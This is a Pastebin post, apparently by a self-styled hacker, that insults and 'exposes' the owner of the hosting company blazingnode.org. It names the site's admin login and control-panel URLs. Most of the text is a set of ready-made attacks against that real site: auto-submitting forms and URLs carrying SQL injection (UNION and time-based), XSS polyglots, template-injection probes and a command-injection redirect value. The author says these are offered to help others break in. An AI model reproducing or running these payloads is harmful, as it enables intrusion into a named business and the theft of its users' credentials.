Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- This won't disclose biggest vulnerabilities of the website considering i don't want to expose deepest gaping holes.
- I want to to expose him for not being an hacker.
- https://soundcloud.com/thothey/dr-raid-nice-report
- dedicated to BlazingNode Owner Scott Wiwek.
- You shouldn't have mess with my boy Chrono - the Infamous ILlKiD Atmos The Wicked
- Got to be to the day that i Die #DG4E
- If you do argue after i will be fuzzing your shit, then abuse of burp, REST,recon,fuzzer http view list goes on , bitch we toolin' up and write our own sadkunt shout out to PP4L, Digital Gangster and thugCrowd.
- Web Server Disclosure
- banner
- server: Apache
- host
- blazingnode.org
- banner
- x-powered-by: PHP/7.0.32
- host
- blazingnode.org
- Did you really think hidden your poor code and premade template behind cloudflare would stop any real hackers.
- It's just a matter of time before someone find a bypass. Ahhh poor little boy, Security is an illusion in this Inet
- Gotta be on point with that bitness fitness.
- X-Frame Option not used
- Can't setup poper header that suck.Ahhh didn't learn how to properly setup a web server...
- http://en.wikipedia.org/wiki/X-FRAME-OPTIONS#Frame-Options
- http://en.wikipedia.org/wiki/Clickjacking
- This is just the more known vulnerabilities that can happen digg a bit and you will find much more.
- about X-frame
- uri
- https://blazingnode.org/
- email
- sales@blazingnode.org
- GET https://blazingnode.org/ HTTP/1.1
- Damn this fool not even on http2. As a provider you should be up to date with latest technology.
- Admin page discovery
- uri
- https://blazingnode.org/admin/login.php?redirect=%2Fadmin%2F
- What the actual fuck, why this is not behind any kind of waf, ssl gateway, etc.
- Such page should always be behind additional security layers and only allow connection from specific VPN ip's you setted up for the compagny in question.
- Path disclosures
- He didn't even learn about gttp status code and how it can reveal server path informations...
- Ahhh those pseudo hackers that pretend that they know something...
- I bet he don't even know OSI layer.
- AutoComplete Enabled
- uri
- https://blazingnode.org/admin/login.php?redirect=%2Fadmin%2F
- <form method="post" action="/admin/dologin.php">
- <form method="post" class="using-password-strength" action="/register.php" role="form" name="orderfrm" id="frmCheckout">
- <form role="form" method="post" action="/index.php?rp=/knowledgebase/search">
- <form method="post" action="contact.php" class="form-horizontal" role="form">
- <form method="post" action="https://blazingnode.org/pwreset.php" role="form">
- uri
- https://cp.blazingnode.org:4085/index.php?act=login&redirect=%2F
- <form accept-charset="UTF-8" action="" method="post" name="loginform" class="form-horizontal">
- uri
- https://blazingnode.org/admin/login.php?action=reset
- <form action="/admin/login.php" method="post" id="frmResetPassword">
- Well , i would like to thanks you for allowing us to easily grab credential.
- It make the job much easier this way.
- The game is either to be sold or taught. So i won't post the best vulnerabilities or path.
- But i'm nice enough to give a List of little hints to proceed sucessfull hacking of blazingnode
- <img src="https://blazingnode.org/admin/login.php?redirect=http%3A%2F%2F9peQR"/>
- <img src="https://blazingnode.org/admin/login.php?redirect=%22%7Cecho%20%27w%27%273%27%27A%27%27n%27%273%27%20%7C%22"/>
- <form method="POST" action="https://blazingnode.org/admin/dologin.php">
- <input type="hidden" name="username" value="zliy8"/>
- <input type="hidden" name="password" value="H2EwgGRxZB"/>
- <input type="hidden" name="token" value="6dba90d19c54f28e48ac0bcbc035889ce1a68660"/>
- <input type="hidden" name="language" value=""/>
- <input type="hidden" name="redirect" value="/admin/"/>
- <input type="hidden" name="rememberme" value="1"/>
- </form>
- <script>document.forms[0].submit()</script>
- <form method="POST" action="https://blazingnode.org/admin/dologin.php">
- <input type="hidden" name="username" value="kAIn2"/>
- <input type="hidden" name="password" value="4qKYZGRxZB"/>
- <input type="hidden" name="token" value="56dac0ee78af252b371e64febd457a51b2386128"/>
- <input type="hidden" name="language" value=""/>
- <input type="hidden" name="redirect" value="&#039;&gt;&lt;sftPM&gt;"/>
- <input type="hidden" name="rememberme" value="1"/>
- </form>
- <script>document.forms[0].submit()</script>
- <form method="POST" action="https://blazingnode.org/admin/dologin.php">
- <input type="hidden" name="username" value="KyVph"/>
- <input type="hidden" name="password" value="sVp4RGRxZB"/>
- <input type="hidden" name="token" value="66c71005b612923975c3df9d3ffea58ebd0d7392"/>
- <input type="hidden" name="language" value=""/>
- <input type="hidden" name="redirect" value="&quot;&gt;&lt;sftPM&gt;"/>
- <input type="hidden" name="rememberme" value="1"/>
- </form>
- <script>document.forms[0].submit()</script>
- <form method="POST" action="https://blazingnode.org/admin/dologin.php">
- <input type="hidden" name="username" value=""><vSrUv>"/>
- <input type="hidden" name="password" value="H2EwgGRxZB"/>
- <input type="hidden" name="token" value="6dba90d19c54f28e48ac0bcbc035889ce1a68660"/>
- <input type="hidden" name="language" value=""/>
- <input type="hidden" name="redirect" value="/admin/"/>
- <input type="hidden" name="rememberme" value="1"/>
- </form>
- <script>document.forms[0].submit()</script>
- <form method="POST" action="https://blazingnode.org/admin/dologin.php">
- <input type="hidden" name="username" value="zliy8"/>
- <input type="hidden" name="password" value="SELECT CONCAT(0x66,0x47,0x6b,0x4f,0x4e)#"/>
- <input type="hidden" name="token" value="6dba90d19c54f28e48ac0bcbc035889ce1a68660"/>
- <input type="hidden" name="language" value=""/>
- <input type="hidden" name="redirect" value="/admin/"/>
- <input type="hidden" name="rememberme" value="1"/>
- </form>
- <script>document.forms[0].submit()</script>
- <form method="POST" action="https://blazingnode.org/admin/dologin.php">
- <input type="hidden" name="username" value="zliy8"/>
- <input type="hidden" name="password" value="H2EwgGRxZB"/>
- <input type="hidden" name="token" value="' UNION ALL SELECT CONCAT(0x66,0x47,0x6b,0x4f,0x4e),NULL#"/>
- <input type="hidden" name="language" value=""/>
- <input type="hidden" name="redirect" value="/admin/"/>
- <input type="hidden" name="rememberme" value="1"/>
- </form>
- <script>document.forms[0].submit()</script>
- <form method="POST" action="https://blazingnode.org/admin/dologin.php">
- <input type="hidden" name="username" value="zliy8"/>
- <input type="hidden" name="password" value="-1 OR 1=(SELECT 1 FROM (SELECT SLEEP(25))A)"/>
- <input type="hidden" name="token" value="6dba90d19c54f28e48ac0bcbc035889ce1a68660"/>
- <input type="hidden" name="language" value=""/>
- <input type="hidden" name="redirect" value="/admin/"/>
- <input type="hidden" name="rememberme" value="1"/>
- </form>
- <script>document.forms[0].submit()</script>
- <?php
- require_once 'HTTP/Request2.php';
- $request = new HTTP_Request2("https://blazingnode.org/templates/blazingnode/js/scripts.min.js?v=5d11cc");
- $request->setAdapter('curl');
- $request->setMethod("GET");
- try {
- $response = $request->send();
- } catch (HTTP_Request2_Exception $e) {
- echo 'Error: ' . $e->getMessage();
- }
- if ($response->getStatus() == 200) {
- echo $response->getBody();
- } else {
- echo 'Unexpected HTTP status: ' . $response->getStatus() . ' ' . $response->getReasonPhrase();
- }
- https://blazingnode.org/clientarea.php?token=1)%3B%20WAITFOR%20DELAY%20%2719%3A00%3A25%27--&token=%27%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F%27%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F%22%3B%0D%0Aalert(String.fromCharCode(88%2C83%2C83))%2F%2F%22%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F--%0D%0A%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(String.fromCharCode(88%2C83%2C83))%3C%2FSCRIPT%3E&token=%7B%7B7*7%7D%7D&username=%27&username=%27%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F%27%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F%22%3B%0D%0Aalert(String.fromCharCode(88%2C83%2C83))%2F%2F%22%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F--%0D%0A%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(String.fromCharCode(88%2C83%2C83))%3C%2FSCRIPT%3E&username=%7B%7B7*7%7D%7D&password=%27&password=%27%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F%27%3Balert(String.fromCharCode(88%2C83%2C83))
- %2F%2F%22%3B%0D%0Aalert(String.fromCharCode(88%2C83%2C83))%2F%2F%22%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F--%0D%0A%3E%3C%2FSCRIPT%3E%22%3E'%3E%3CSCRIPT%3Ealert(String.fromCharCode(88%2C83%2C83))%3C%2FSCRIPT%3E&password=%7B%7B77%7D%7D&rememberme='&rememberme='%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F'%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F%22%3B%0D%0Aalert(String.fromCharCode(88%2C83%2C83))%2F%2F%22%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F--%0D%0A%3E%3C%2FSCRIPT%3E%22%3E'%3E%3CSCRIPT%3Ealert(String.fromCharCode(88%2C83%2C83))%3C%2FSCRIPT%3E&rememberme=%7B%7B77%7D%7D
- GET https://blazingnode.org/clientarea.php?token=1)%3B%20WAITFOR%20DELAY%20%2719%3A00%3A25%27--&token=%27%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F%27%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F%22%3B%0D%0Aalert(String.fromCharCode(88%2C83%2C83))%2F%2F%22%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F--%0D%0A%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(String.fromCharCode(88%2C83%2C83))%3C%2FSCRIPT%3E&token=%7B%7B7*7%7D%7D&username=%27&username=%27%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F%27%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F%22%3B%0D%0Aalert(String.fromCharCode(88%2C83%2C83))%2F%2F%22%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F--%0D%0A%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(String.fromCharCode(88%2C83%2C83))%3C%2FSCRIPT%3E&username=%7B%7B7*7%7D%7D&password=%27&password=%27%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F%27%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F%
- rated high on owasp
- https://blazingnode.org/admin/login.php?redirect=%2Fadmin%2F
- whcms
- POST https://blazingnode.org/admin/dologin.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 309 username=vbYOc&password=OrKf4qHfa7&token=54e5a9a4f806fdf9175410f35b52a383a880cff6&language=&redirect=%26lt%3Babc%20xmlns%3Axyz%3D%26%23039%3Bhttp%3A%2F%2Fwww.w3.org%2F1999%2Fxhtml%26%23039%3B%26gt%3B%26lt%3Bxyz%3Abody%20onload%3D%26%23039%3Btry(bBuVa)%26%23039%3B%2F%26gt%3B%26lt%3B%2Fabc%26gt%3B&rememberme=1
- https://cp.blazingnode.org:4085/index.php?act=login&redirect=%2Findex.php%3F1234%2520%2527%2520AND%25201%3D0%2520UNION%2520ALL%2520SELECT%2520%2527admin%2527%2C%2520%252781dc9bdb52d04dc20036dbd8313ed055
- https://blazingnode.org/clientarea.php?token=%27&username=%27&password=%27&rememberme=%27&token=%27;alert(String.fromCharCode(88,83,83))//%27;alert(String.fromCharCode(88,83,83))//%22;%0D%0Aalert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//--%0D%0A%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E&username=%27;alert(String.fromCharCode(88,83,83))//%27;alert(String.fromCharCode(88,83,83))//%22;%0D%0Aalert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//--%0D%0A%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E&password=%27;alert(String.fromCharCode(88,83,83))//%27;alert(String.fromCharCode(88,83,83))//%22;%0D%0Aalert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//--%0D%0A%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E&rememberme=%27;alert(String.fromCharCode(88,83,83))//%27;alert(String.fromCharCode(88,83,83))//%22;%0D%0Aalert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//--%0D%0A%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E
- https://cp.blazingnode.org:4085/index.php?act=login&redirect=%2F&username=%27&password=%27&login=%27&username=jaVasCript:/*-/*%60/*/%60/*%27/*%22/**/(/*%20*/oNcliCk=alert()%20)//%0D%0A%0d%0a//%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--!%3E%3CsVg/%3CsVg/oNloAd=alert()//%3E%3E&password=jaVasCript:/*-/*%60/*/%60/*%27/*%22/**/(/*%20*/oNcliCk=alert()%20)//%0D%0A%0d%0a//%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--!%3E%3CsVg/%3CsVg/oNloAd=alert()//%3E%3E&login=jaVasCript:/*-/*%60/*/%60/*%27/*%22/**/(/*%20*/oNcliCk=alert()%20)//%0D%0A%0d%0a//%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--!%3E%3CsVg/%3CsVg/oNloAd=alert()//%3E%3E&username=%7B%7B7*7%7D%7D&password=%7B%7B7*7%7D%7D&login=%7B%7B7*7%7D%7D
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement